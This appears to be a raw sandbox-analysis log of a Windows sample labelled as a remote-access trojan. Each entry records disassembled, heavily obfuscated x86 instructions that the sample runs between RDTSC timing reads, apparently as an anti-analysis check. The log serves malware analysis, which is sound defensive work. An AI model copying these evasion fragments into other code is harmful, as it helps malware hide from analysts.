                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52DA6F second address: 52DAB0 instructions: 0x00000000 rdtsc 0x00000002 not bl 0x00000004 lea edx, dword ptr [00000000h+edi*4] 0x0000000b cpuid 0x0000000d cpuid 0x0000000f mov eax, edx 0x00000011 jmp 00007F8AB1593E63h 0x00000013 cpuid 0x00000015 bt edi, esi 0x00000018 mov di, 4DFBh 0x0000001c bsr edi, edi 0x0000001f btr edx, esi 0x00000022 inc eax 0x00000023 call 00007F8AB1593EA6h 0x00000028 jmp 00007F8AB1593EDFh 0x0000002a not ah 0x0000002c mov byte ptr [esp+01h], ch 0x00000030 sub esp, 04h 0x00000033 mov bl, byte ptr [esp+02h] 0x00000037 neg ecx 0x00000039 mov cx, 9377h 0x0000003d jmp 00007F8AB1593E77h 0x0000003f cpuid 0x00000041 bsf eax, eax 0x00000044 neg bx 0x00000047 xchg eax, ebp 0x00000048 mov si, E8D3h 0x0000004c mov bp, dx 0x0000004f jmp 00007F8AB1593ED1h 0x00000051 clc 0x00000052 xchg dword ptr [esp+01h], edx 0x00000056 push di 0x00000058 sub esp, 00000000h 0x0000005b sub esp, 12h 0x0000005e clc 0x0000005f jmp 00007F8AB1593E7Ch 0x00000061 bsr ebx, ebp 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52E047 second address: 52DC15 instructions: 0x00000000 rdtsc 0x00000002 pop di 0x00000004 cld 0x00000005 rol eax, 07h 0x00000008 mov bx, word ptr [esp] 0x0000000c jmp 00007F8AB0DEE7D6h 0x00000011 xchg ebp, esi 0x00000013 mov dl, cl 0x00000015 push word ptr [esp+01h] 0x0000001a not bh 0x0000001c xchg word ptr [esp], si 0x00000020 bswap ecx 0x00000022 jmp 00007F8AB0DEE743h 0x00000027 inc edx 0x00000028 xchg dh, ch 0x0000002a lea esp, dword ptr [esp+04h] 0x0000002e xchg ebx, esi 0x00000030 mov bl, D7h 0x00000032 xchg ebx, edi 0x00000034 jmp 00007F8AB0DEE8E4h 0x00000036 setb ch 0x00000039 dec bx 0x0000003b call 00007F8AB0DEE8C5h 0x00000040 xchg bp, cx 0x00000043 lea esp, dword ptr [esp+01h] 0x00000047 mov word ptr [esp+01h], si 0x0000004c lea esp, dword ptr [esp+03h] 0x00000050 jmp 00007F8AB0DEE917h 0x00000052 lea esi, dword ptr [esp+000000B2h] 0x00000059 sete al 0x0000005c stc 0x0000005d std 0x0000005e xchg al, cl 0x00000060 call 00007F8AB0DEE9A4h 0x00000065 pushfd 0x00000066 jmp 00007F8AB0DEE900h 0x00000068 pop word ptr [esp+04h] 0x0000006d mov al, dh 0x0000006f setl dh 0x00000072 sub esp, 0Dh 0x00000075 bsr esi, esp 0x00000078 jmp 00007F8AB0DEE968h 0x0000007a mov ecx, edx 0x0000007c lea ebp, dword ptr [B1C33945h] 0x00000082 xchg di, bp 0x00000085 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52DF76 second address: 52E073 instructions: 0x00000000 rdtsc 0x00000002 xchg di, si 0x00000005 bswap edi 0x00000007 jmp 00007F8AB1593E77h 0x00000009 xchg ch, ah 0x0000000b mov si, word ptr [esp] 0x0000000f mov bx, 90E2h 0x00000013 mov edx, ebp 0x00000015 mov ecx, esp 0x00000017 call 00007F8AB1593ED3h 0x0000001c push dword ptr [esp+02h] 0x00000020 jmp 00007F8AB1593E86h 0x00000022 not ch 0x00000024 lea ebx, dword ptr [ecx+000000A1h] 0x0000002a mov al, DDh 0x0000002c pop word ptr [esp+02h] 0x00000031 jmp 00007F8AB1593EADh 0x00000033 mov bh, ch 0x00000035 lea esi, dword ptr [00000000h+ebx*4] 0x0000003c mov word ptr [esp+03h], si 0x00000041 mov esi, 2CA17698h 0x00000046 bswap ecx 0x00000048 push word ptr [esp+02h] 0x0000004d jmp 00007F8AB1593EE2h 0x0000004f mov dh, byte ptr [esp+02h] 0x00000053 push dword ptr [esp+06h] 0x00000057 lea esp, dword ptr [esp+0Ah] 0x0000005b xchg word ptr [esp], bp 0x0000005f xchg ax, di 0x00000061 push word ptr [esp] 0x00000065 call 00007F8AB1593E6Fh 0x0000006a jmp 00007F8AB1593EECh 0x0000006c pop word ptr [esp+01h] 0x00000071 mov byte ptr [esp+02h], bl 0x00000075 call 00007F8AB1593E4Dh 0x0000007a bswap edi 0x0000007c xchg edi, ecx 0x0000007e mov dl, byte ptr [esp+01h] 0x00000082 xchg ebx, eax 0x00000084 jmp 00007F8AB1593ECAh 0x00000086 mov cx, 439Eh 0x0000008a xchg word ptr [esp+05h], bx 0x0000008f push word ptr [esp+05h] 0x00000094 call 00007F8AB1593EF2h 0x00000099 pop ecx 0x0000009a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 52E68E second address: 52E69B instructions: 0x00000000 rdtsc 0x00000002 xchg word ptr [esp+03h], dx 0x00000007 xchg bl, ah 0x00000009 jmp 00007F8AB0DEE914h 0x0000000b mov dl, bl 0x0000000d pop dx 0x0000000f call 00007F8AB0DEE936h 0x00000014 push dword ptr [esp+03h] 0x00000018 cpuid 0x0000001a lea edx, dword ptr [00000000h+ebx*4] 0x00000021 not bx 0x00000024 jmp 00007F8AB0DEE95Fh 0x00000026 lea esi, dword ptr [esp+0000F8EDh] 0x0000002d xchg byte ptr [esp+0Dh], dh 0x00000031 mov edx, dword ptr [esp+0Eh] 0x00000035 cpuid 0x00000037 lea esp, dword ptr [esp+01h] 0x0000003b pushad 0x0000003c jmp 00007F8AB0DEE96Fh 0x0000003e pop si 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4870FE second address: 487106 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 6FF8h 0x00000006 mov dl, al 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 487106 second address: 487356 instructions: 0x00000000 rdtsc 0x00000002 bsr cx, ax 0x00000006 jno 00007F8AB0DEE96Bh 0x00000008 jmp 00007F8AB0DEE970h 0x0000000a xchg cl, ah 0x0000000c mov ah, byte ptr [esp] 0x0000000f jmp 00007F8AB0DEE97Fh 0x00000011 neg esi 0x00000013 sub esp, 0Bh 0x00000016 jp 00007F8AB0DEE935h 0x00000018 lea eax, dword ptr [ebx+edi] 0x0000001b jmp 00007F8AB0DEE9DBh 0x00000020 not dx 0x00000023 bswap eax 0x00000025 mov cx, E141h 0x00000029 jmp 00007F8AB0DEE980h 0x0000002b add esp, 03h 0x0000002e jmp 00007F8AB0DEE937h 0x00000030 lea esp, dword ptr [esp+08h] 0x00000034 neg esi 0x00000036 sub esp, 0Bh 0x00000039 jc 00007F8AB0DEE962h 0x0000003b jnc 00007F8AB0DEE9A4h 0x0000003d pop word ptr [esp] 0x00000041 setns cl 0x00000044 xchg dword ptr [esp+03h], eax 0x00000048 jmp 00007F8AB0DEE92Fh 0x0000004a lea eax, dword ptr [ecx+esi] 0x0000004d mov cl, 09h 0x0000004f jmp 00007F8AB0DEE96Eh 0x00000051 mov cl, byte ptr [esp] 0x00000054 lea esp, dword ptr [esp+01h] 0x00000058 lea esp, dword ptr [esp+08h] 0x0000005c add esi, 395AD57Fh 0x00000062 cmp ax, 0000A1BFh 0x00000066 jmp 00007F8AB0DEE981h 0x00000068 jbe 00007F8AB0DEE9C1h 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 487356 second address: 4872F6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 765D225Fh 0x00000007 mov ecx, FC5B28A4h 0x0000000c bsr ax, si 0x00000010 sub esi, 68829BC1h 0x00000016 mov dx, word ptr [esp] 0x0000001a jmp 00007F8AB1593E36h 0x0000001c mov dh, byte ptr [esp] 0x0000001f mov al, 1Ah 0x00000021 lea ecx, dword ptr [eax+edx] 0x00000024 setb dh 0x00000027 mov eax, dword ptr [esp] 0x0000002a lea edx, dword ptr [esp+ebx] 0x0000002d jmp 00007F8AB1593E79h 0x0000002f dec esi 0x00000030 rcr dl, 00000006h 0x00000033 jc 00007F8AB1593EDBh 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 49799B second address: 497A16 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE956h 0x00000004 lea ecx, dword ptr [ecx+edi] 0x00000007 lea edx, dword ptr [00000000h+ebx*4] 0x0000000e jmp 00007F8AB0DEEA35h 0x00000013 mov esi, dword ptr [ebp+00h] 0x00000016 mov ecx, edx 0x00000018 mov edx, 8EB07D69h 0x0000001d stc 0x0000001e jns 00007F8AB0DEE8EFh 0x00000020 jmp 00007F8AB0DEE8F9h 0x00000022 rcl ch, 00000000h 0x00000025 add ebp, 04h 0x00000028 bsf ax, ax 0x0000002c je 00007F8AB0DEE930h 0x0000002e lea edx, dword ptr [eax+eax] 0x00000031 mov ch, bh 0x00000033 jmp 00007F8AB0DEE970h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48ADEA second address: 48AE34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593EE2h 0x00000004 mov ax, C344h 0x00000008 bswap eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48AFA8 second address: 48B06E instructions: 0x00000000 rdtsc 0x00000002 lea esp, dword ptr [esp+03h] 0x00000006 xor cl, FFFFFFC2h 0x00000009 bsr eax, ebx 0x0000000c jmp 00007F8AB0DEE9A1h 0x0000000e jp 00007F8AB0DEE966h 0x00000010 mov ax, si 0x00000013 mov dx, word ptr [esp] 0x00000017 jmp 00007F8AB0DEE9B0h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48B06E second address: 48B186 instructions: 0x00000000 rdtsc 0x00000002 and eax, ebx 0x00000004 bsr edx, esp 0x00000007 jmp 00007F8AB1593E54h 0x00000009 bswap edx 0x0000000b jmp 00007F8AB1593EB8h 0x0000000d dec cl 0x0000000f bsr dx, bp 0x00000013 jmp 00007F8AB1593EF2h 0x00000015 je 00007F8AB1593E54h 0x00000017 setp al 0x0000001a mov edx, eax 0x0000001c jmp 00007F8AB1593E52h 0x0000001e call 00007F8AB1593EF0h 0x00000023 mov eax, 4B8EAC0Fh 0x00000028 mov dx, di 0x0000002b adc dx, 1AB4h 0x00000030 rcr al, 00000002h 0x00000033 xchg dword ptr [esp], ebx 0x00000036 jmp 00007F8AB1593ED4h 0x00000038 lea edx, dword ptr [00000000h+ebx*4] 0x0000003f btc dx, bx 0x00000043 mov dh, 6Ch 0x00000045 mov dx, B473h 0x00000049 bts dx, sp 0x0000004d lea ebx, dword ptr [ebx+1Eh] 0x00000050 jmp 00007F8AB1594231h 0x00000055 mov dl, B7h 0x00000057 lea edx, dword ptr [edx+ebx] 0x0000005a bswap edx 0x0000005c mov dx, word ptr [esp] 0x00000060 bts edx, edi 0x00000063 xchg dword ptr [esp], ebx 0x00000066 jmp 00007F8AB1593D0Fh 0x0000006b bsr dx, sp 0x0000006f mov ax, word ptr [esp] 0x00000073 xchg ah, dh 0x00000075 mov ax, 08E7h 0x00000079 mov dx, cx 0x0000007c push dword ptr [esp] 0x0000007f retn 0004h 0x00000082 and ecx, 3Ch 0x00000085 jmp 00007F8AB1593FA7h 0x0000008a mov al, byte ptr [esp] 0x0000008d mov eax, esi 0x0000008f rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48B47B second address: 48B569 instructions: 0x00000000 rdtsc 0x00000002 rcr dl, cl 0x00000004 jmp 00007F8AB0DEEA08h 0x00000009 inc ebp 0x0000000a sub esp, 04h 0x0000000d jl 00007F8AB0DEE934h 0x0000000f mov edx, edi 0x00000011 pushfd 0x00000012 lea eax, dword ptr [00000000h+eax*4] 0x00000019 mov eax, dword ptr [esp] 0x0000001c jmp 00007F8AB0DEE9D5h 0x00000021 neg eax 0x00000023 jmp 00007F8AB0DEE8D1h 0x00000028 mov al, ah 0x0000002a setbe al 0x0000002d shl dx, 1 0x00000030 jl 00007F8AB0DEE993h 0x00000032 setle dh 0x00000035 bt ax, sp 0x00000039 xor cl, 0000003Eh 0x0000003c bswap eax 0x0000003e jmp 00007F8AB0DEE905h 0x00000040 mov dx, 1CAEh 0x00000044 lea edx, dword ptr [00000000h+ebp*4] 0x0000004b rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48A5A2 second address: 48A562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593F83h 0x00000007 jmp 00007F8AB1593D6Bh 0x0000000c ror cl, 00000000h 0x0000000f mov eax, FED2A885h 0x00000014 lea edx, dword ptr [eax+00004342h] 0x0000001a mov al, 8Bh 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 497AC6 second address: 497BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE9B1h 0x00000004 sub esi, 04h 0x00000007 mov dx, 73F9h 0x0000000b mov ax, E32Dh 0x0000000f rcl ax, cl 0x00000012 jnl 00007F8AB0DEE922h 0x00000014 jmp 00007F8AB0DEE98Ah 0x00000016 bsr edx, esi 0x00000019 mov ecx, dword ptr [ebp+00h] 0x0000001c mov dx, bx 0x0000001f bsr ax, dx 0x00000023 jmp 00007F8AB0DEEA19h 0x00000028 ja 00007F8AB0DEE842h 0x0000002e lea eax, dword ptr [esi+54h] 0x00000031 lea edx, dword ptr [esp+eax] 0x00000034 mov al, dh 0x00000036 bsr ax, bx 0x0000003a lea eax, dword ptr [esp+edi] 0x0000003d bswap eax 0x0000003f call 00007F8AB0DEE99Dh 0x00000044 sub esp, 01h 0x00000047 mov dx, ax 0x0000004a xchg byte ptr [esp], al 0x0000004d mov byte ptr [esp], bl 0x00000050 mov byte ptr [esp], al 0x00000053 jmp 00007F8AB0DEE983h 0x00000055 lea esp, dword ptr [esp+01h] 0x00000059 xchg dword ptr [esp], edi 0x0000005c neg dx 0x0000005f mov eax, esi 0x00000061 lea edx, dword ptr [FA2511AAh] 0x00000067 jmp 00007F8AB0DEE928h 0x00000069 mov eax, 5C79E6DCh 0x0000006e call 00007F8AB0DEE9A0h 0x00000073 lea edi, dword ptr [edi+5Eh] 0x00000076 mov edx, esi 0x00000078 dec dx 0x0000007a lea edx, dword ptr [ecx-3Bh] 0x0000007d or eax, 50115FD1h 0x00000082 jmp 00007F8AB0DEE929h 0x00000084 sete dh 0x00000087 xchg dword ptr [esp+04h], edi 0x0000008b rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 49928B second address: 4992AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593EBBh 0x00000004 push esi 0x00000005 mov ch, B9h 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4992AB second address: 499323 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov byte ptr [esp+1Ah], bh 0x00000007 jmp 00007F8AB0DEE99Dh 0x00000009 btr esi, esi 0x0000000c jbe 00007F8AB0DEE937h 0x0000000e neg ebx 0x00000010 mov eax, dword ptr [esp] 0x00000013 jmp 00007F8AB0DEE971h 0x00000015 add esp, 20h 0x00000018 jmp 00007F8AB0DEF32Fh 0x0000001d jns 00007F8AB0DEDF77h 0x00000023 pop edi 0x00000024 mov dx, di 0x00000027 lea ebx, dword ptr [00000000h+eax*4] 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4A94F0 second address: 4A999D instructions: 0x00000000 rdtsc 0x00000002 not dx 0x00000005 btr eax, esi 0x00000008 jnc 00007F8AB1594340h 0x0000000e jc 00007F8AB1594036h 0x00000014 shr dh, 1 0x00000016 jmp 00007F8AB15941A4h 0x0000001b sub ebp, 04h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 48B022 second address: 48B186 instructions: 0x00000000 rdtsc 0x00000002 and eax, ebx 0x00000004 bsr edx, esp 0x00000007 bswap edx 0x00000009 jmp 00007F8AB0DEE968h 0x0000000b dec cl 0x0000000d bsr dx, bp 0x00000011 jmp 00007F8AB0DEE9A2h 0x00000013 je 00007F8AB0DEE904h 0x00000015 setp al 0x00000018 mov edx, eax 0x0000001a jmp 00007F8AB0DEE902h 0x0000001c call 00007F8AB0DEE9A0h 0x00000021 mov eax, 4B8EAC0Fh 0x00000026 mov dx, di 0x00000029 adc dx, 1AB4h 0x0000002e rcr al, 00000002h 0x00000031 xchg dword ptr [esp], ebx 0x00000034 jmp 00007F8AB0DEE984h 0x00000036 lea edx, dword ptr [00000000h+ebx*4] 0x0000003d btc dx, bx 0x00000041 mov dh, 6Ch 0x00000043 mov dx, B473h 0x00000047 bts dx, sp 0x0000004b lea ebx, dword ptr [ebx+1Eh] 0x0000004e jmp 00007F8AB0DEECE1h 0x00000053 mov dl, B7h 0x00000055 lea edx, dword ptr [edx+ebx] 0x00000058 bswap edx 0x0000005a mov dx, word ptr [esp] 0x0000005e bts edx, edi 0x00000061 xchg dword ptr [esp], ebx 0x00000064 jmp 00007F8AB0DEE7BFh 0x00000069 bsr dx, sp 0x0000006d mov ax, word ptr [esp] 0x00000071 xchg ah, dh 0x00000073 mov ax, 08E7h 0x00000077 mov dx, cx 0x0000007a push dword ptr [esp] 0x0000007d retn 0004h 0x00000080 and ecx, 3Ch 0x00000083 jmp 00007F8AB0DEEA57h 0x00000088 mov al, byte ptr [esp] 0x0000008b mov eax, esi 0x0000008d rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 49901A second address: 499086 instructions: 0x00000000 rdtsc 0x00000002 dec dh 0x00000004 jmp 00007F8AB1593ECCh 0x00000006 add cl, FFFFFFA1h 0x00000009 xchg ah, al 0x0000000b bsr edx, edi 0x0000000e jnbe 00007F8AB1593ED3h 0x00000010 xchg eax, edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 49B208 second address: 4870FE instructions: 0x00000000 rdtsc 0x00000002 add ecx, E346A1A5h 0x00000008 push dword ptr [esp+1Ch] 0x0000000c retn 0020h 0x0000000f push esi 0x00000010 jmp 00007F8AB0DEE9C8h 0x00000012 and edx, D81356B1h 0x00000018 jnp 00007F8AB0DEE9B2h 0x0000001a mov dx, word ptr [esp] 0x0000001e mov ah, 72h 0x00000020 jmp 00007F8AB0DEE926h 0x00000022 mov ecx, ebx 0x00000024 mov edx, 568228A5h 0x00000029 jmp 00007F8AB0DEE999h 0x0000002b mov cx, word ptr [esp] 0x0000002f pop ebp 0x00000030 lea eax, dword ptr [ebx+esi] 0x00000033 not ax 0x00000036 jmp 00007F8AB0DEE921h 0x00000038 bts si, dx 0x0000003c jle 00007F8AB0DEE97Dh 0x0000003e mov al, cl 0x00000040 jmp 00007F8AB0DEE97Bh 0x00000042 pop esi 0x00000043 jmp 00007F8AB0DDA802h 0x00000048 mov ebx, esi 0x0000004a mov dh, cl 0x0000004c jmp 00007F8AB0DEE909h 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 49A712 second address: 49A6AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 not edx 0x00000005 jmp 00007F8AB1593E61h 0x00000007 push edi 0x00000008 mov cl, byte ptr [esp] 0x0000000b lea edi, dword ptr [edi-7Bh] 0x0000000e setnle dl 0x00000011 mov edx, 58BD0688h 0x00000016 mov bl, dl 0x00000018 jmp 00007F8AB1593E57h 0x0000001a cmc 0x0000001b jns 00007F8AB1593E89h 0x0000001d bswap edi 0x0000001f jmp 00007F8AB1593ED5h 0x00000021 lea ecx, dword ptr [edi+3498DDEDh] 0x00000027 push esp 0x00000028 mov esi, dword ptr [esp+04h] 0x0000002c btc edx, ebx 0x0000002f jmp 00007F8AB1593EBCh 0x00000031 jns 00007F8AB1593E5Ch 0x00000033 lea esp, dword ptr [esp+08h] 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 499046 second address: 499086 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE9CAh 0x00000004 dec dh 0x00000006 jmp 00007F8AB0DEE8D6h 0x00000008 add cl, FFFFFFA1h 0x0000000b xchg ah, al 0x0000000d bsr edx, edi 0x00000010 jnbe 00007F8AB0DEE983h 0x00000012 xchg eax, edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4A88E9 second address: 4A88F6 instructions: 0x00000000 rdtsc 0x00000002 mov bl, cl 0x00000004 jmp 00007F8AB1593EC9h 0x00000006 jmp 00007F8AB1593E79h 0x00000008 mov ebp, dword ptr [esp] 0x0000000b lea esp, dword ptr [esp+04h] 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4A88F6 second address: 4A8956 instructions: 0x00000000 rdtsc 0x00000002 mov bx, word ptr [esp] 0x00000006 lea edi, dword ptr [ecx+esi] 0x00000009 call 00007F8AB0DEE97Fh 0x0000000e jmp 00007F8AB0DEE93Ah 0x00000010 add esp, 08h 0x00000013 jle 00007F8AB0DEE97Bh 0x00000015 jnle 00007F8AB0DEE979h 0x00000017 pop esi 0x00000018 call 00007F8AB0DEE939h 0x0000001d mov eax, ebp 0x0000001f neg bx 0x00000022 jmp 00007F8AB0DEE9A8h 0x00000024 jle 00007F8AB0DEE90Fh 0x00000026 jnle 00007F8AB0DEE90Dh 0x00000028 add esp, 04h 0x0000002b jmp 00007F8AB0DEE978h 0x0000002d jnbe 00007F8AB0DEE92Eh 0x0000002f pop ebx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4A8956 second address: 4870FE instructions: 0x00000000 rdtsc 0x00000002 call 00007F8AB1593EEFh 0x00000007 mov edx, dword ptr [esp+02h] 0x0000000b jmp 00007F8AB1593E86h 0x0000000d add esp, 04h 0x00000010 jns 00007F8AB1593EB9h 0x00000012 pop edi 0x00000013 jmp 00007F8AB1572633h 0x00000018 mov ebx, esi 0x0000001a mov dh, cl 0x0000001c jmp 00007F8AB1593E59h 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4992C7 second address: 4992AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB0DEE92Fh 0x00000004 push esi 0x00000005 mov ch, B9h 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4AAC43 second address: 4AAC64 instructions: 0x00000000 rdtsc 0x00000002 xchg cx, dx 0x00000005 jmp 00007F8AB1593ED2h 0x00000007 mov al, dh 0x00000009 xchg dword ptr [esp], esi 0x0000000c setbe ch 0x0000000f mov ch, bl 0x00000011 lea ecx, dword ptr [ebx+54h] 0x00000014 lea esi, dword ptr [esi+27h] 0x00000017 jmp 00007F8AB1593E7Ah 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4AAC64 second address: 49833F instructions: 0x00000000 rdtsc 0x00000002 xchg al, dl 0x00000004 mov dx, word ptr [esp] 0x00000008 xchg dword ptr [esp], esi 0x0000000b jmp 00007F8AB0DEE96Dh 0x0000000d lea eax, dword ptr [00000000h+eax*4] 0x00000014 mov dx, word ptr [esp] 0x00000018 mov ah, 97h 0x0000001a not ah 0x0000001c push dword ptr [esp] 0x0000001f retn 0004h 0x00000022 ja 00007F8AB0DDBFA4h 0x00000028 jmp 00007F8AB0DEE97Dh 0x0000002a movzx ecx, byte ptr [ebp+00h] 0x0000002e sub esp, 00000000h 0x00000031 js 00007F8AB0DEE91Eh 0x00000033 rcl dh, cl 0x00000035 jmp 00007F8AB0DEEA42h 0x0000003a sub esp, 18h 0x0000003d lea eax, dword ptr [eax+ebp] 0x00000040 bswap eax 0x00000042 jmp 00007F8AB0DEE8F8h 0x00000044 bts eax, edx 0x00000047 jmp 00007F8AB0DEE882h 0x0000004c rcl dh, cl 0x0000004e call 00007F8AB0DEE9B0h 0x00000053 mov eax, DD22D1A1h 0x00000058 sub esp, 0Eh 0x0000005b lea esp, dword ptr [esp+06h] 0x0000005f mov ah, dl 0x00000061 xchg eax, edx 0x00000062 jmp 00007F8AB0DEE983h 0x00000064 xchg dword ptr [esp+08h], ebp 0x00000068 bswap edx 0x0000006a mov ah, byte ptr [esp] 0x0000006d lea ebp, dword ptr [ebp+71h] 0x00000070 pushad 0x00000071 lea edx, dword ptr [475C02B4h] 0x00000077 jmp 00007F8AB0DEE927h 0x00000079 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4B9816 second address: 4B97DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8AB1593E61h 0x00000004 add ebp, 02h 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4872E7 second address: 4872F6 instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 765D225Fh 0x00000007 jmp 00007F8AB0DEE931h 0x00000009 mov ecx, FC5B28A4h 0x0000000e bsr ax, si 0x00000012 jmp 00007F8AB0DEE9DEh 0x00000017 sub esi, 68829BC1h 0x0000001d mov dx, word ptr [esp] 0x00000021 jmp 00007F8AB0DEE8E6h 0x00000023 mov dh, byte ptr [esp] 0x00000026 mov al, 1Ah 0x00000028 lea ecx, dword ptr [eax+edx] 0x0000002b setb dh 0x0000002e mov eax, dword ptr [esp] 0x00000031 lea edx, dword ptr [esp+ebx] 0x00000034 jmp 00007F8AB0DEE929h 0x00000036 dec esi 0x00000037 rcr dl, 00000006h 0x0000003a jc 00007F8AB0DEE98Bh 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4B1379 second address: 4B1387 instructions: 0x00000000 rdtsc 0x00000002 neg edx 0x00000004 js 00007F8AB1593E86h 0x00000006 call 00007F8AB1593EDCh 0x0000000b mov ecx, EEB6F27Eh 0x00000010 mov ecx, dword ptr [ebp+00h] 0x00000013 jmp 00007F8AB1593E7Ah 0x00000015 mov ax, word ptr [esp] 0x00000019 mov eax, edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeRDTSC instruction interceptor: First address: 4B8CBF second address: 4AAC43 instructions: 0x00000000 rdtsc 0x00000002 call 00007F8AB0DEE956h 0x00000007 mov byte ptr [esp+01h], dl 0x0000000b clc 0x0000000c jmp 00007F8AB0DEE987h 0x0000000e jnl 00007F8AB0DEE91Fh 0x00000010 sub esi, 08h 0x00000013 jmp 00007F8AB0DEE968h 0x00000015 xchg edx, ecx 0x00000017 call 00007F8AB0DEE985h 0x0000001c lea esp, dword ptr [esp+01h] 0x00000020 push word ptr [esp] 0x00000024 js 00007F8AB0DEE92Bh 0x00000026 jns 00007F8AB0DEE970h 0x00000028 sub esp, 1Ah 0x0000002b lea esp, dword ptr [esp+03h] 0x0000002f jmp 00007F8AB0DEE909h 0x00000031 mov dword ptr [esi], ecx 0x00000033 mov cl, ch 0x00000035 jmp 00007F8AB0DEE96Eh 0x00000037 lea ecx, dword ptr [00000000h+edi*4] 0x0000003e call 00007F8AB0DEE986h 0x00000043 mov byte ptr [esp+01h], dh 0x00000047 mov dword ptr [esi+04h], eax 0x0000004a mov ah, 76h 0x0000004c sub esp, 13h 0x0000004f jmp 00007F8AB0DEE956h 0x00000051 jnbe 00007F8AB0DEE928h 0x00000053 xchg byte ptr [esp+0Dh], ch 0x00000057 call 00007F8AB0DEEA59h 0x0000005c lea esp, dword ptr [esp+03h] 0x00000060 jmp 00007F8AB0DE06FAh 0x00000065 pushad 0x00000066 push word ptr [esp+06h] 0x0000006b jbe 00007F8AB0DEE928h 0x0000006d lea esp, dword ptr [esp+02h] 0x00000071 jmp 00007F8AB0DEE92Ch 0x00000073 lea edx, dword ptr [edi+50h] 0x00000076 xchg eax, ecx 